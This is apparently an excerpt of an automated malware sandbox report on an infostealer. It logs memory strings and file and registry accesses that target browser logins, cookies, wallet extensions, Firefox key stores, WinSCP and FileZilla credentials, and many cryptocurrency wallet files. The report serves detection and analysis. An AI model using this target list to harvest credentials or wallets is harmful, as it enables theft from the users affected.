Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Opens network shares
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: \\config\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: \\config\Jump to behavior
                    Tries to harvest and steal Bitcoin Wallet information
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
